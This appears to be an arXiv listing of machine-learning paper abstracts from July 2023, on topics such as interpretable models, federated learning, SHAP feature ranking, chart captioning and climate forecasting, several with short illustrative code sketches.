    The current approach to ML model design is either to choose a flexible Blackbox model and explain it post hoc or to start with an interpretable model. Blackbox models are flexible but difficult to explain, whereas interpretable models are designed to be explainable. However, developing interpretable models necessitates extensive ML knowledge, and the resulting models tend to be less flexible, offering potentially subpar performance compared to their Blackbox equivalents. This paper aims to blur the distinction between a post hoc explanation of a Blackbox and constructing interpretable models. We propose beginning with a flexible Blackbox model and gradually \emph{carving out} a mixture of interpretable models and a \emph{residual network}. Our design identifies a subset of samples and \emph{routes} them through the interpretable models. The remaining samples are routed through a flexible residual network. We adopt First Order Logic (FOL) as the interpretable model's backbone, which provides basic reasoning on concepts retrieved from the Blackbox model. On the residual network, we repeat the method until the proportion of data explained by the residual network falls below a desired threshold. Our approach offers several advantages. First, the mixture of interpretable models and a flexible residual network results in almost no compromise in performance. Second, the route, interpret, and repeat approach yields a highly flexible interpretable model. Our extensive experiments demonstrate the performance of the model on various datasets. We show that by editing the FOL model, we can fix a shortcut learned by the original Blackbox model. Finally, our method provides a framework for a hybrid symbolic-connectionist network that is simple to train and adaptable to many applications.
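The carve-out loop can be caricatured as follows. The `fit_rule` interface, the coverage-based stopping rule, and the routing bookkeeping are simplified stand-ins for the paper's FOL-based experts and residual network, not its actual design:

```python
import numpy as np

def route_interpret_repeat(X, bb_pred, fit_rule, coverage_stop=0.2,
                           max_iters=5):
    """Toy sketch of the carving loop: repeatedly fit a simple
    interpretable expert on the samples it can explain, route the
    rest onward, and stop once the residual fraction is small.

    fit_rule(X, y) must return (predict_fn, covered_mask); samples
    left with route == -1 belong to the residual network.
    """
    experts = []
    routes = np.full(len(X), -1)                 # -1 = residual network
    remaining = np.arange(len(X))
    for k in range(max_iters):
        if len(remaining) / len(X) <= coverage_stop:
            break                                # residual small enough
        predict, covered = fit_rule(X[remaining], bb_pred[remaining])
        experts.append(predict)
        routes[remaining[covered]] = k           # route covered samples
        remaining = remaining[~covered]          # residual for next round
    return experts, routes
```

Each round carves one expert out of whatever the previous rounds could not explain; the stopping threshold plays the role of the "desired threshold" in the abstract.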
    SHAP@k: Efficient and Probably Approximately Correct (PAC) Identification of Top-k Features. (arXiv:2307.04850v1 [cs.LG])
    The SHAP framework provides a principled method to explain the predictions of a model by computing feature importance. Motivated by applications in finance, we introduce the Top-k Identification Problem (TkIP), where the objective is to identify the k features with the highest SHAP values. While any method to compute SHAP values with uncertainty estimates (such as KernelSHAP and SamplingSHAP) can be trivially adapted to solve TkIP, doing so is highly sample inefficient. The goal of our work is to improve the sample efficiency of existing methods in the context of solving TkIP. Our key insight is that TkIP can be framed as an Explore-m problem -- a well-studied problem related to multi-armed bandits (MAB). This connection enables us to improve sample efficiency by leveraging two techniques from the MAB literature: (1) a better stopping condition that identifies when PAC (Probably Approximately Correct) guarantees have been met, and (2) a greedy sampling scheme that judiciously allocates samples between different features. By adopting these methods we develop KernelSHAP@k and SamplingSHAP@k to efficiently solve TkIP, offering an average improvement of $5\times$ in sample efficiency and runtime across most common credit-related datasets.
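An Explore-m-style loop of the kind the paper leverages might look like the sketch below: keep sampling until the confidence intervals of the k-th and (k+1)-th ranked features separate. The interval form, the round-robin allocation (the paper uses a greedy scheme), and the tolerance are simplified assumptions, not the paper's PAC machinery:

```python
import numpy as np

def topk_with_ci(sample_fn, n_features, k, eps=0.05, batch=50,
                 max_samples=20000):
    """Identify the top-k features from noisy importance estimates.

    sample_fn(j) draws one noisy estimate of feature j's SHAP value.
    Stops when the k-th and (k+1)-th ranked means are separated up to
    eps after accounting for rough confidence intervals.
    """
    sums = np.zeros(n_features)
    sqs = np.zeros(n_features)
    counts = np.zeros(n_features)
    while counts.sum() < max_samples:
        for j in range(n_features):              # round-robin allocation
            for _ in range(batch):
                v = sample_fn(j)
                sums[j] += v
                sqs[j] += v * v
                counts[j] += 1
        means = sums / counts
        std = np.sqrt(np.maximum(sqs / counts - means**2, 0))
        ci = 2 * std / np.sqrt(counts)           # rough 95%-style half-width
        order = np.argsort(-means)
        gap = (means[order[k - 1]] - ci[order[k - 1]]
               - means[order[k]] - ci[order[k]])
        if gap > -eps:                           # separated up to eps: stop
            return set(order[:k].tolist())
    return set(np.argsort(-sums / counts)[:k].tolist())
```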
    Fed-CPrompt: Contrastive Prompt for Rehearsal-Free Federated Continual Learning. (arXiv:2307.04869v1 [cs.LG])
    Federated continual learning (FCL) learns incremental tasks over time from confidential datasets distributed across clients. This paper focuses on rehearsal-free FCL, which has severe forgetting issues when learning new tasks due to the lack of access to historical task data. To address this issue, we propose Fed-CPrompt, based on prompt learning techniques, to obtain task-specific prompts in a communication-efficient way. Fed-CPrompt introduces two key components, asynchronous prompt learning and contrastive continual loss, to handle asynchronous task arrival and heterogeneous data distributions in FCL, respectively. Extensive experiments demonstrate the effectiveness of Fed-CPrompt in achieving SOTA rehearsal-free FCL performance.
    VisText: A Benchmark for Semantically Rich Chart Captioning. (arXiv:2307.05356v1 [cs.CV])
    Captions that describe or explain charts help improve recall and comprehension of the depicted data and provide a more accessible medium for people with visual disabilities. However, current approaches for automatically generating such captions struggle to articulate the perceptual or cognitive features that are the hallmark of charts (e.g., complex trends and patterns). In response, we introduce VisText: a dataset of 12,441 pairs of charts and captions that describe the charts' construction, report key statistics, and identify perceptual and cognitive phenomena. In VisText, a chart is available as three representations: a rasterized image, a backing data table, and a scene graph -- a hierarchical representation of a chart's visual elements akin to a web page's Document Object Model (DOM). To evaluate the impact of VisText, we fine-tune state-of-the-art language models on our chart captioning task and apply prefix-tuning to produce captions that vary the semantic content they convey. Our models generate coherent, semantically rich captions and perform on par with state-of-the-art chart captioning models across machine translation and text generation metrics. Through qualitative analysis, we identify six broad categories of errors that our models make that can inform future work.
    Forming Trees with Treeformers. (arXiv:2207.06960v2 [cs.CL] UPDATED)
    Human language is known to exhibit a nested, hierarchical structure, allowing us to form complex sentences out of smaller pieces. However, many state-of-the-art neural network models such as Transformers have no explicit hierarchical structure in their architecture -- that is, they don't have an inductive bias toward hierarchical structure. Additionally, Transformers are known to perform poorly on compositional generalization tasks, which require such structures. In this paper, we introduce Treeformer, a general-purpose encoder module inspired by the CKY algorithm which learns a composition operator and pooling function to construct hierarchical encodings for phrases and sentences. Our extensive experiments demonstrate the benefits of incorporating hierarchical structure into the Transformer and show significant improvements in compositional generalization as well as in downstream tasks such as machine translation, abstractive summarization, and various natural language understanding tasks.
    Decentralized Federated Learning: Fundamentals, State of the Art, Frameworks, Trends, and Challenges. (arXiv:2211.08413v3 [cs.LG] UPDATED)
    In the last decade, Federated Learning (FL) has gained relevance in training collaborative models without sharing sensitive data. Since its birth, Centralized FL (CFL) has been the most common approach in the literature, where a central entity creates a global model. However, a centralized approach leads to increased latency due to bottlenecks, heightened vulnerability to system failures, and trustworthiness concerns affecting the entity responsible for the global model creation. Decentralized Federated Learning (DFL) emerged to address these concerns by promoting decentralized model aggregation and minimizing reliance on centralized architectures. However, despite the work done in DFL, the literature has not (i) studied the main aspects differentiating DFL and CFL; (ii) analyzed DFL frameworks to create and evaluate new solutions; and (iii) reviewed application scenarios using DFL. Thus, this article identifies and analyzes the main fundamentals of DFL in terms of federation architectures, topologies, communication mechanisms, security approaches, and key performance indicators. Additionally, the paper at hand explores existing mechanisms to optimize critical DFL fundamentals. Then, the most relevant features of the current DFL frameworks are reviewed and compared. After that, it analyzes the most used DFL application scenarios, identifying solutions based on the fundamentals and frameworks previously defined. Finally, the evolution of existing DFL solutions is studied to provide a list of trends, lessons learned, and open challenges.
    DRMC: A Generalist Model with Dynamic Routing for Multi-Center PET Image Synthesis. (arXiv:2307.05249v1 [eess.IV])
    Multi-center positron emission tomography (PET) image synthesis aims at recovering low-dose PET images from multiple different centers. The generalizability of existing methods can still be suboptimal for a multi-center study due to domain shifts, which result from non-identical data distribution among centers with different imaging systems/protocols. While some approaches address domain shifts by training specialized models for each center, they are parameter inefficient and do not well exploit the shared knowledge across centers. To address this, we develop a generalist model that shares architecture and parameters across centers to utilize the shared knowledge. However, the generalist model can suffer from the center interference issue, \textit{i.e.} the gradient directions of different centers can be inconsistent or even opposite owing to the non-identical data distribution. To mitigate such interference, we introduce a novel dynamic routing strategy with cross-layer connections that routes data from different centers to different experts. Experiments show that our generalist model with dynamic routing (DRMC) exhibits excellent generalizability across centers. Code and data are available at: https://github.com/Yaziwel/Multi-Center-PET-Image-Synthesis.
    Combating Data Imbalances in Federated Semi-supervised Learning with Dual Regulators. (arXiv:2307.05358v1 [cs.LG])
    Federated learning has become a popular method to learn from decentralized heterogeneous data. Federated semi-supervised learning (FSSL) emerges to train models from a small fraction of labeled data due to label scarcity on decentralized clients. Existing FSSL methods assume independent and identically distributed (IID) labeled data across clients and consistent class distribution between labeled and unlabeled data within a client. This work studies a more practical and challenging scenario of FSSL, where data distribution is different not only across clients but also within a client between labeled and unlabeled data. To address this challenge, we propose a novel FSSL framework with dual regulators, FedDure. FedDure lifts the previous assumption with a coarse-grained regulator (C-reg) and a fine-grained regulator (F-reg): C-reg regularizes the updating of the local model by tracking the learning effect on labeled data distribution; F-reg learns an adaptive weighting scheme tailored for unlabeled instances in each client. We further formulate the client model training as bi-level optimization that adaptively optimizes the model in the client with two regulators. Theoretically, we show the convergence guarantee of the dual regulators. Empirically, we demonstrate that FedDure is superior to the existing methods across a wide range of settings, notably by more than 11% on the CIFAR-10 and CINIC-10 datasets.
    On the Need for a Language Describing Distribution Shifts: Illustrations on Tabular Datasets. (arXiv:2307.05284v1 [cs.LG])
    Different distribution shifts require different algorithmic and operational interventions. Methodological research must be grounded by the specific shifts they address. Although nascent benchmarks provide a promising empirical foundation, they implicitly focus on covariate shifts, and the validity of empirical findings depends on the type of shift, e.g., previous observations on algorithmic performance can fail to be valid when the $Y|X$ distribution changes. We conduct a thorough investigation of natural shifts in 5 tabular datasets over 86,000 model configurations, and find that $Y|X$-shifts are most prevalent. To encourage researchers to develop a refined language for distribution shifts, we build WhyShift, an empirical testbed of curated real-world shifts where we characterize the type of shift we benchmark performance over. Since $Y|X$-shifts are prevalent in tabular settings, we identify covariate regions that suffer the biggest $Y|X$-shifts and discuss implications for algorithmic and data-based interventions. Our testbed highlights the importance of future research that builds an understanding of how distributions differ.
    Supervised Attention Using Homophily in Graph Neural Networks. (arXiv:2307.05217v1 [cs.LG])
    Graph neural networks have become the standard approach for dealing with learning problems on graphs. Among the different variants of graph neural networks, graph attention networks (GATs) have been applied with great success to different tasks. In the GAT model, each node assigns an importance score to its neighbors using an attention mechanism. However, similar to other graph neural networks, GATs aggregate messages from nodes that belong to different classes, and therefore produce node representations that are not well separated with respect to the different classes, which might hurt their performance. In this work, to alleviate this problem, we propose a new technique that can be incorporated into any graph attention model to encourage higher attention scores between nodes that share the same class label. We evaluate the proposed method on several node classification datasets demonstrating increased performance over standard baseline models.
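A minimal version of the proposed idea, an auxiliary loss that rewards high attention scores on same-class edges, might look like the sketch below. The binary cross-entropy form against a homophily indicator is an illustrative stand-in; the paper's supervised-attention term may differ:

```python
import numpy as np

def homophily_attention_loss(attn, edges, labels):
    """Auxiliary loss encouraging higher attention on same-class edges.

    attn: dict mapping edge (i, j) -> attention score in (0, 1);
    edges: list of (i, j) pairs; labels: node class labels.
    Pushes same-class attention toward 1 and cross-class toward 0.
    """
    loss = 0.0
    for (i, j) in edges:
        a = attn[(i, j)]
        same = 1.0 if labels[i] == labels[j] else 0.0
        # binary cross-entropy against the homophily indicator
        loss -= same * np.log(a + 1e-12) + (1 - same) * np.log(1 - a + 1e-12)
    return loss / len(edges)
```

Added to the task loss, such a term steers the attention mechanism toward neighbors sharing the node's label, which is the behavior the paper encourages.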
    Geometric Neural Diffusion Processes. (arXiv:2307.05431v1 [stat.ML])
    Denoising diffusion models have proven to be a flexible and effective paradigm for generative modelling. Their recent extension to infinite-dimensional Euclidean spaces has allowed for the modelling of stochastic processes. However, many problems in the natural sciences incorporate symmetries and involve data living in non-Euclidean spaces. In this work, we extend the framework of diffusion models to incorporate a series of geometric priors in infinite-dimensional modelling. We do so by a) constructing a noising process which admits, as limiting distribution, a geometric Gaussian process that transforms under the symmetry group of interest, and b) approximating the score with a neural network that is equivariant w.r.t. this group. We show that with these conditions, the generative functional model admits the same symmetry. We demonstrate the scalability and capacity of the model, using a novel Langevin-based conditional sampler, to fit complex scalar and vector fields, with Euclidean and spherical codomain, on synthetic and real-world weather data.
    Leveraging an Alignment Set in Tackling Instance-Dependent Label Noise. (arXiv:2307.04868v1 [cs.LG])
    Noisy training labels can hurt model performance. Most approaches that aim to address label noise assume label noise is independent of the input features. In practice, however, label noise is often feature- or \textit{instance-dependent}, and therefore biased (i.e., some instances are more likely to be mislabeled than others). E.g., in clinical care, female patients are more likely to be under-diagnosed for cardiovascular disease compared to male patients. Approaches that ignore this dependence can produce models with poor discriminative performance, and in many healthcare settings, can exacerbate issues around health disparities. In light of these limitations, we propose a two-stage approach to learn in the presence of instance-dependent label noise. Our approach utilizes \textit{anchor points}, a small subset of data for which we know the observed and ground-truth labels. On several tasks, our approach leads to consistent improvements over the state-of-the-art in discriminative performance (AUROC) while mitigating bias (area under the equalized odds curve, AUEOC). For example, when predicting acute respiratory failure onset on the MIMIC-III dataset, our approach achieves a harmonic mean (of AUROC and AUEOC) of 0.84 (SD [standard deviation] 0.01) while that of the next best baseline is 0.81 (SD 0.01). Overall, our approach improves accuracy while mitigating potential bias compared to existing approaches in the presence of instance-dependent label noise.
    PowerFusion: A Tensor Compiler with Explicit Data Movement Description and Instruction-level Graph IR. (arXiv:2307.04995v1 [cs.LG])
    Deep neural networks (DNNs) are of critical use in different domains. To accelerate DNN computation, tensor compilers are proposed to generate efficient code on different domain-specific accelerators. Existing tensor compilers mainly focus on optimizing computation efficiency. However, memory access is becoming a key performance bottleneck because the computational performance of accelerators is increasing much faster than memory performance. The lack of direct description of memory access and data dependence in current tensor compilers' intermediate representation (IR) brings significant challenges to generating memory-efficient code. In this paper, we propose IntelliGen, a tensor compiler that can generate high-performance code for memory-intensive operators by considering both computation and data movement optimizations. IntelliGen represents a DNN program using GIR, which includes primitives indicating its computation, data movement, and parallel strategies. This information is further composed as an instruction-level dataflow graph to perform holistic optimizations by searching different memory access patterns and computation operations, and generating memory-efficient code on different hardware. We evaluate IntelliGen on NVIDIA GPU, AMD GPU, and Cambricon MLU, showing speedups of up to 1.97x, 2.93x, and 16.91x (1.28x, 1.23x, and 2.31x on average), respectively, compared to the current most performant frameworks.
    Estimating label quality and errors in semantic segmentation data via any model. (arXiv:2307.05080v1 [cs.LG])
    The labor-intensive annotation process of semantic segmentation datasets is often prone to errors, since humans struggle to label every pixel correctly. We study algorithms to automatically detect such annotation errors, in particular methods to score label quality, such that the images with the lowest scores are least likely to be correctly labeled. This helps prioritize what data to review in order to ensure a high-quality training/evaluation dataset, which is critical in sensitive applications such as medical imaging and autonomous vehicles. Widely applicable, our label quality scores rely on probabilistic predictions from a trained segmentation model -- any model architecture and training procedure can be utilized. Here we study 7 different label quality scoring methods used in conjunction with a DeepLabV3+ or a FPN segmentation model to detect annotation errors in a version of the SYNTHIA dataset. Precision-recall evaluations reveal a score -- the soft-minimum of the model-estimated likelihoods of each pixel's annotated class -- that is particularly effective to identify images that are mislabeled, across multiple types of annotation error.
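The soft-minimum score can be sketched as follows: take the model-estimated likelihood of each pixel's annotated class and aggregate with a soft minimum, so a few badly mislabeled pixels drag the image's score down. The exponential weighting and temperature are one plausible instantiation, not necessarily the paper's exact formula:

```python
import numpy as np

def softmin_label_quality(probs, annotation, temperature=0.1):
    """Score an image's label quality via the soft-minimum over pixels
    of the model-estimated likelihood of the annotated class.

    probs: (H, W, C) per-pixel class probabilities from any trained
    segmentation model; annotation: (H, W) integer label map. Lower
    temperature pushes soft-min toward the hard minimum.
    """
    h, w = annotation.shape
    # likelihood the model assigns to the annotated class at each pixel
    lik = probs[np.arange(h)[:, None], np.arange(w)[None, :], annotation]
    weights = np.exp(-lik / temperature)   # emphasize low-likelihood pixels
    return float((weights * lik).sum() / weights.sum())
```

Images can then be ranked by this score and the lowest-scoring ones sent for review first, as the abstract describes.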
    FedYolo: Augmenting Federated Learning with Pretrained Transformers. (arXiv:2307.04905v1 [cs.LG])
    The growth and diversity of machine learning applications motivate a rethinking of learning with mobile and edge devices. How can we address diverse client goals and learn with scarce heterogeneous data? While federated learning aims to address these issues, it has challenges hindering a unified solution. Large transformer models have been shown to work across a variety of tasks achieving remarkable few-shot adaptation. This raises the question: Can clients use a single general-purpose model, rather than custom models for each task, while obeying device and network constraints? In this work, we investigate pretrained transformers (PTF) to achieve these on-device learning goals and thoroughly explore the roles of model size and modularity, where the latter refers to adaptation through modules such as prompts or adapters. Focusing on federated learning, we demonstrate that: (1) Larger scale shrinks the accuracy gaps between alternative approaches and improves heterogeneity robustness. Scale allows clients to run more local SGD epochs which can significantly reduce the number of communication rounds. At the extreme, clients can achieve respectable accuracy locally highlighting the potential of fully-local learning. (2) Modularity, by design, enables $>$100$\times$ less communication in bits. Surprisingly, it also boosts the generalization capability of local adaptation methods and the robustness of smaller PTFs. Finally, it enables clients to solve multiple unrelated tasks simultaneously using a single PTF, whereas full updates are prone to catastrophic forgetting. These insights on scale and modularity motivate a new federated learning approach we call "You Only Load Once" (FedYolo): The clients load a full PTF model once and all future updates are accomplished through communication-efficient modules with limited catastrophic-forgetting, where each task is assigned to its own module.
    ClimaX: A foundation model for weather and climate. (arXiv:2301.10343v3 [cs.LG] UPDATED)
    Most state-of-the-art approaches for weather and climate modeling are based on physics-informed numerical models of the atmosphere. These approaches aim to model the non-linear dynamics and complex interactions between multiple variables, which are challenging to approximate. Additionally, many such numerical models are computationally intensive, especially when modeling the atmospheric phenomenon at a fine-grained spatial and temporal resolution. Recent data-driven approaches based on machine learning instead aim to directly solve a downstream forecasting or projection task by learning a data-driven functional mapping using deep neural networks. However, these networks are trained using curated and homogeneous climate datasets for specific spatiotemporal tasks, and thus lack the generality of numerical models. We develop and demonstrate ClimaX, a flexible and generalizable deep learning model for weather and climate science that can be trained using heterogeneous datasets spanning different variables, spatio-temporal coverage, and physical groundings. ClimaX extends the Transformer architecture with novel encoding and aggregation blocks that allow effective use of available compute while maintaining general utility. ClimaX is pre-trained with a self-supervised learning objective on climate datasets derived from CMIP6. The pre-trained ClimaX can then be fine-tuned to address a breadth of climate and weather tasks, including those that involve atmospheric variables and spatio-temporal scales unseen during pretraining. Compared to existing data-driven baselines, we show that this generality in ClimaX results in superior performance on benchmarks for weather forecasting and climate projections, even when pretrained at lower resolutions and compute budgets. The source code is available at https://github.com/microsoft/ClimaX.
    Reject option models comprising out-of-distribution detection. (arXiv:2307.05199v1 [cs.LG])
    The optimal prediction strategy for out-of-distribution (OOD) setups is a fundamental question in machine learning. In this paper, we address this question and present several contributions. We propose three reject option models for OOD setups: the Cost-based model, the Bounded TPR-FPR model, and the Bounded Precision-Recall model. These models extend the standard reject option models used in non-OOD setups and define the notion of an optimal OOD selective classifier. We establish that all the proposed models, despite their different formulations, share a common class of optimal strategies. Motivated by the optimal strategy, we introduce double-score OOD methods that leverage uncertainty scores from two chosen OOD detectors: one focused on OOD/ID discrimination and the other on misclassification detection. The experimental results consistently demonstrate the superior performance of this simple strategy compared to state-of-the-art methods. Additionally, we propose novel evaluation metrics derived from the definition of the optimal strategy under the proposed OOD rejection models. These new metrics provide a comprehensive and reliable assessment of OOD methods without the deficiencies observed in existing evaluation approaches.
    MAP- and MLE-Based Teaching. (arXiv:2307.05252v1 [cs.LG])
    Imagine a learner L who tries to infer a hidden concept from a collection of observations. Building on the work [4] of Ferri et al., we assume the learner to be parameterized by priors P(c) and by c-conditional likelihoods P(z|c) where c ranges over all concepts in a given class C and z ranges over all observations in an observation set Z. L is called a MAP-learner (resp. an MLE-learner) if it thinks of a collection S of observations as a random sample and returns the concept with the maximum a-posteriori probability (resp. the concept which maximizes the c-conditional likelihood of S). Depending on whether L assumes that S is obtained from ordered or unordered sampling resp. from sampling with or without replacement, we can distinguish four different sampling modes. Given a target concept c in C, a teacher for a MAP-learner L aims at finding a smallest collection of observations that causes L to return c. This approach leads in a natural manner to various notions of a MAP- or MLE-teaching dimension of a concept class C. Our main results are: We show that this teaching model has some desirable monotonicity properties. We clarify how the four sampling modes are related to each other. As for the (important!) special case, where concepts are subsets of a domain and observations are 0,1-labeled examples, we obtain some additional results. First of all, we characterize the MAP- and MLE-teaching dimension associated with an optimally parameterized MAP-learner graph-theoretically. From this central result, some other ones are easy to derive. It is shown, for instance, that the MLE-teaching dimension is either equal to the MAP-teaching dimension or exceeds the latter by 1. It is shown furthermore that these dimensions can be bounded from above by the so-called antichain number, the VC-dimension and related combinatorial parameters. Moreover they can be computed in polynomial time.
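In symbols, writing $P(S \mid c)$ for the $c$-conditional likelihood of the collection $S$ under the chosen sampling mode, the two learners return

```latex
c_{\mathrm{MAP}}(S) \;=\; \operatorname*{argmax}_{c \in C} \; P(c)\,P(S \mid c),
\qquad
c_{\mathrm{MLE}}(S) \;=\; \operatorname*{argmax}_{c \in C} \; P(S \mid c),
```

and the MAP- (resp. MLE-) teaching dimension of $C$ is the worst case over target concepts $c \in C$ of the size of the smallest collection $S$ that makes the learner return $c$.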
    Hybrid hidden Markov LSTM for short-term traffic flow prediction. (arXiv:2307.04954v1 [cs.LG])
    Deep learning (DL) methods have outperformed parametric models such as the historical average, ARIMA, and variants in predicting traffic variables into the short and near-short-term future, which is critical for traffic management. Specifically, recurrent neural networks (RNNs) and their variants (e.g. long short-term memory) are designed to retain long-term temporal correlations and are therefore suitable for modeling sequences. However, multi-regime models assume the traffic system evolves through multiple states (say, free-flow and congestion) with distinct characteristics, and hence separate models are trained to characterize the traffic dynamics within each regime. For instance, a Markov-switching model with a hidden Markov model (HMM) for regime identification is capable of capturing complex dynamic patterns and non-stationarity. Interestingly, both HMMs and LSTMs can be used for modeling an observation sequence from a set of latent or hidden state variables. In an LSTM, the latent variable is computed deterministically from the current observation and the previous latent variable, while in an HMM the sequence of latent variables is a Markov chain. Inspired by research in natural language processing, a hybrid hidden Markov-LSTM model that is capable of learning complementary features in traffic data is proposed for traffic flow prediction. Results indicate significant performance gains from the hybrid architecture compared to conventional methods such as Markov-switching ARIMA and LSTM.
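The contrast between the two latent-variable models drawn in the abstract can be written compactly as

```latex
\text{LSTM (deterministic latent):}\quad h_t = f(h_{t-1}, x_t),
\qquad
\text{HMM (stochastic latent):}\quad z_t \sim P(z_t \mid z_{t-1}),\;\; x_t \sim P(x_t \mid z_t),
```

which is why the two can learn complementary features: the LSTM latent state is a deterministic summary of the observed history, whereas the HMM latent state is a random regime variable evolving as a Markov chain.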
    Measuring and Mitigating Interference in Reinforcement Learning. (arXiv:2307.04887v1 [cs.LG])
    Catastrophic interference is common in many network-based learning systems, and many proposals exist for mitigating it. Before overcoming interference we must understand it better. In this work, we provide a definition and novel measure of interference for value-based reinforcement learning methods such as Fitted Q-Iteration and DQN. We systematically evaluate our measure of interference, showing that it correlates with instability in control performance, across a variety of network architectures. Our new interference measure allows us to ask novel scientific questions about commonly used deep learning architectures and study learning algorithms which mitigate interference. Lastly, we outline a class of algorithms which we call online-aware that are designed to mitigate interference, and show they do reduce interference according to our measure and that they improve stability and performance in several classic control environments.
    Predicting small molecules solubilities on endpoint devices using deep ensemble neural networks. (arXiv:2307.05318v1 [physics.chem-ph])
    Aqueous solubility is a valuable yet challenging property to predict. Computing solubility using first-principles methods requires accounting for the competing effects of entropy and enthalpy, resulting in long computations for relatively poor accuracy. Data-driven approaches, such as deep learning, offer improved accuracy and computational efficiency but typically lack uncertainty quantification. Additionally, ease of use remains a concern for any computational technique, resulting in the sustained popularity of group-based contribution methods. In this work, we addressed these problems with a deep learning model with predictive uncertainty that runs on a static website (without a server). This approach moves computing needs onto the website visitor without requiring installation, removing the need to pay for and maintain servers. Our model achieves satisfactory results in solubility prediction. Furthermore, we demonstrate how to create molecular property prediction models that balance uncertainty and ease of use. The code is available at \url{https://github.com/ur-whitelab/mol.dev}, and the model is usable at \url{https://mol.dev}.
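The deep-ensemble recipe for predictive uncertainty, averaging member outputs for the point estimate and using their spread as the uncertainty, is standard; the sketch below shows the idea (it is not the exact head used by the mol.dev model):

```python
import numpy as np

def ensemble_predict(models, x):
    """Deep-ensemble style prediction: mean of member predictions as
    the estimate, standard deviation across members as a simple
    predictive-uncertainty proxy.

    models: list of callables mapping features -> scalar solubility.
    """
    preds = np.array([m(x) for m in models])
    return preds.mean(), preds.std()
```

In a browser deployment like the one described, each member would be a small network evaluated client-side and the std reported alongside the predicted solubility.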
    Compact Twice Fusion Network for Edge Detection. (arXiv:2307.04952v1 [cs.CV])
The significance of multi-scale features has been gradually recognized by the edge detection community. However, the fusion of multi-scale features increases the complexity of the model, which is not friendly to practical application. In this work, we propose a Compact Twice Fusion Network (CTFN) to fully integrate multi-scale features while maintaining the compactness of the model. CTFN includes two lightweight multi-scale feature fusion modules: a Semantic Enhancement Module (SEM) that can utilize the semantic information contained in coarse-scale features to guide the learning of fine-scale features, and a Pseudo Pixel-level Weighting (PPW) module that aggregates the complementary merits of multi-scale features by assigning weights to all features. Nevertheless, the interference of texture noise still makes the correct classification of some pixels a challenge. For these hard samples, we propose a novel loss function, coined Dynamic Focal Loss, which reshapes the standard cross-entropy loss and dynamically adjusts the weights to correct the distribution of hard samples. We evaluate our method on three datasets, i.e., BSDS500, NYUDv2, and BIPEDv2. Compared with state-of-the-art methods, CTFN achieves competitive accuracy with fewer parameters and lower computational cost. Apart from the backbone, CTFN requires only 0.1M additional parameters, which reduces its computation cost to just 60% of other state-of-the-art methods. The codes are available at https://github.com/Li-yachuan/CTFN-pytorch-master.
    Intrinsically motivated graph exploration using network theories of human curiosity. (arXiv:2307.04962v1 [cs.LG])
    Intrinsically motivated exploration has proven useful for reinforcement learning, even without additional extrinsic rewards. When the environment is naturally represented as a graph, how to guide exploration best remains an open question. In this work, we propose a novel approach for exploring graph-structured data motivated by two theories of human curiosity: the information gap theory and the compression progress theory. The theories view curiosity as an intrinsic motivation to optimize for topological features of subgraphs induced by the visited nodes in the environment. We use these proposed features as rewards for graph neural-network-based reinforcement learning. On multiple classes of synthetically generated graphs, we find that trained agents generalize to larger environments and to longer exploratory walks than are seen during training. Our method computes more efficiently than the greedy evaluation of the relevant topological properties. The proposed intrinsic motivations bear particular relevance for recommender systems. We demonstrate that curiosity-based recommendations are more predictive of human behavior than PageRank centrality for several real-world graph datasets, including MovieLens, Amazon Books, and Wikispeedia.
    Empowering recommender systems using automatically generated Knowledge Graphs and Reinforcement Learning. (arXiv:2307.04996v1 [cs.IR])
Personalized recommendations have a growing importance in direct marketing, which motivates research to enhance customer experiences by knowledge graph (KG) applications. For example, in financial services, companies may benefit from providing relevant financial articles to their customers to cultivate relationships, foster client engagement and promote informed financial decisions. While several approaches center on KG-based recommender systems for improved content, in this study we focus on interpretable KG-based recommender systems for decision making. To this end, we present two knowledge graph-based approaches for personalized article recommendations for a set of customers of a large multinational financial services company. The first approach employs Reinforcement Learning and the second approach uses the XGBoost algorithm for recommending articles to the customers. Both approaches make use of a KG generated from both structured (tabular data) and unstructured data (a large body of text data). Using the Reinforcement Learning-based recommender system we could leverage the graph traversal path leading to the recommendation as a way to generate interpretations (Path Directed Reasoning (PDR)). In the XGBoost-based approach, one can also provide explainable results using post-hoc methods such as SHAP (SHapley Additive exPlanations) and ELI5 (Explain Like I am Five). Importantly, our approach offers explainable results, promoting better decision-making. This study underscores the potential of combining advanced machine learning techniques with KG-driven insights to bolster experience in customer relationship management.
    BayesFlow: Amortized Bayesian Workflows With Neural Networks. (arXiv:2306.16015v2 [cs.LG] UPDATED)
    Modern Bayesian inference involves a mixture of computational techniques for estimating, validating, and drawing conclusions from probabilistic models as part of principled workflows for data analysis. Typical problems in Bayesian workflows are the approximation of intractable posterior distributions for diverse model types and the comparison of competing models of the same process in terms of their complexity and predictive performance. This manuscript introduces the Python library BayesFlow for simulation-based training of established neural network architectures for amortized data compression and inference. Amortized Bayesian inference, as implemented in BayesFlow, enables users to train custom neural networks on model simulations and re-use these networks for any subsequent application of the models. Since the trained networks can perform inference almost instantaneously, the upfront neural network training is quickly amortized.
    Self Expanding Neural Networks. (arXiv:2307.04526v2 [cs.LG] UPDATED)
    The results of training a neural network are heavily dependent on the architecture chosen; and even a modification of only the size of the network, however small, typically involves restarting the training process. In contrast to this, we begin training with a small architecture, only increase its capacity as necessary for the problem, and avoid interfering with previous optimization while doing so. We thereby introduce a natural gradient based approach which intuitively expands both the width and depth of a neural network when this is likely to substantially reduce the hypothetical converged training loss. We prove an upper bound on the "rate" at which neurons are added, and a computationally cheap lower bound on the expansion score. We illustrate the benefits of such Self-Expanding Neural Networks in both classification and regression problems, including those where the appropriate architecture size is substantially uncertain a priori.
    TOAST: Transfer Learning via Attention Steering. (arXiv:2305.15542v2 [cs.CV] UPDATED)
    Transfer learning involves adapting a pre-trained model to novel downstream tasks. However, we observe that current transfer learning methods often fail to focus on task-relevant features. In this work, we explore refocusing model attention for transfer learning. We introduce Top-Down Attention Steering (TOAST), a novel transfer learning algorithm that keeps the pre-trained backbone frozen, selects task-relevant features in the output, and feeds those features back to the model to steer the attention to the task-specific features. By refocusing the attention only, TOAST achieves state-of-the-art results on a number of transfer learning benchmarks, while having a small number of tunable parameters. Compared to fully fine-tuning, LoRA, and prompt tuning, TOAST substantially improves performance across a range of fine-grained visual classification datasets (e.g., 81.1% -> 86.2% on FGVC). TOAST also outperforms the fully fine-tuned Alpaca and Vicuna models on instruction-following language generation. Code is available at https://github.com/bfshi/TOAST.
    Empowering Cross-lingual Behavioral Testing of NLP Models with Typological Features. (arXiv:2307.05454v1 [cs.CL])
